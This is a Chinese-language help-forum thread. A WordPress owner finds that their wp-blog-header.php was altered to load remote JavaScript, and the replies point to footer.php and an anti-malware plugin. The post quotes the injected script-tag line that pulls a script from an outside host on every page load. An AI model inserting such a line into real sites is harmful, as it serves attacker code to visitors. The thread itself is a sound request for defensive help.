出于某种原因,我的网站被黑了。
我查看了我的FTP文件,发现最近修改了wp-blog-header.php。
这是我被wp-blog-header.php攻击之前的事件:
<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( !isset($wp_did_header) ) {
$wp_did_header = true;
require_once( dirname(__FILE__) . '/wp-load.php' );
wp();
require_once( ABSPATH . WPINC . '/template-loader.php' );
}
这是我被黑客攻击后的文件:
<?php echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>";
/**
* Loads the WordPress environment and template.
...
所以,他们将这一行添加到我的文件中:
echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>";
当我删除此行时,我的网站工作正常,但几个小时后他们再次添加此行。我检查了我的数据库行,但我找不到任何错误。 在我看来,这是一个新的失败。我昨天用谷歌搜索了一下,我找不到多少,只有一些法国网站,他们没有任何明确的解决方案来解决这个问题。那么,有没有人经历过它?
这些是我在本网站及其各自版本中使用的插件:
WordPress v4.1.8
Advanced Custom Fields v4.0.0
答案 0 :(得分:0)
wp-blog-header.php不是受此恶意软件影响的唯一文件。检查你的footer.php(你的主题文件)。
我还没弄明白它是如何感染wp安装的。虽然我正在研究它。
答案 1 :(得分:0)
也发生在我身上。幸运的是,我刚刚安装了一个安全插件,它提醒我一个我知道未经授权的登录,我正在调查,现在将再次更新。
答案 2 :(得分:-1)
使用插件防恶意软件GOTMLS.NET https://wordpress.org/plugins/gotmls/它已经为我们提供了完全相同的问题,到目前为止一直很好,差不多24小时并且脚本还没有被看到。